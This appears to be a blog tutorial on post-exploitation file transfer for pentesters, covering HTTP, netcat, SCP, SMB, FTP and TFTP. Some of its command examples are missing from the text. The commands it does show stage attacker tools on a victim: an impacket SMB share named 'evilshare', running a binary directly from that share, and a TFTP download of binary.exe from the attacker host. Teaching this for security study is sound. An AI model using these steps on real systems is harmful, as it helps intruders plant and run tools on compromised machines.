File Transfer is one of the most crucial aspects of post-exploitation. You will need to move files, exploits, or tools between the victim's machine and your machine. You need to know various methods of transferring files depending on the OS and tools available on the system. Some of them are below:
Linux
HTTP
If the target machine has wget or curl installed, the easiest way to transfer files is through HTTP. You need to start an HTTP server on your host machine in the directory which contains the file you want to transfer.
Now you can download the files on the target machine as follows.
Netcat
If netcat is installed on the target machine, we can use it to transfer files.
SCP
If you have SSH access to the target machine, you can transfer files using SCP as follows:
Windows
HTTP
Even though Windows doesn't have wget, we can use other options to download files via HTTP. Some of them are:
Powershell
Certutil
Bitsadmin
SMB
The easiest method to transfer files between Linux and Windows is SMB since it doesn't require any special configuration or commands, and SMB is built-in on every Windows machine. You can also execute any binary on SMB without needing to copy it over the target machine.
First, start an smb share on your host machine.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py evilshare .
smbserver.py
may defer from mine depending on your impacket installation.You can test if the SMB share is up using net view
command on windows.
net view \\<host_ip>
Now you can copy files from share to the target machine using copy
or move
and vice versa.
or you can execute the binary directly from the share without copying
\\<target_ip>\share-name\binary.exe
FTP
FTP is another method as handy as SMB as it's also built-in on Windows. However, it will only work if you have an interactive shell where you can use the FTP prompt to issue commands. If you don't have an interactive shell, you will need to create a file containing the command and feed it to FTP.
Install a python library called pyftpdlib
.
sudo apt-get install python3-pyftpdlib
Start an FTP server with:
If you have an interactive shell, you can just log into the FTP server with ftp <host_ip> <port>
and use the credentials anonymous. If you don't have an interactive shell, create a text file with the following content.
Now, simply run ftp -s:filename.txt
, and it will download the file you specified.
TFTP
TFTP is similar to FTP, but it isn't installed natively on newer versions of Windows. If it is available (you can also enable it with pkgmgr /iu:"TFTP"
) on the target machine, you can start a TFTP server on your machine with:
service atftpd start
and get files from the target machine with:
tftp -i <host_ip> GET binary.exe
These are the most popular methods of post-exploit file transfer on Windows and Linux! Catch you in the next one.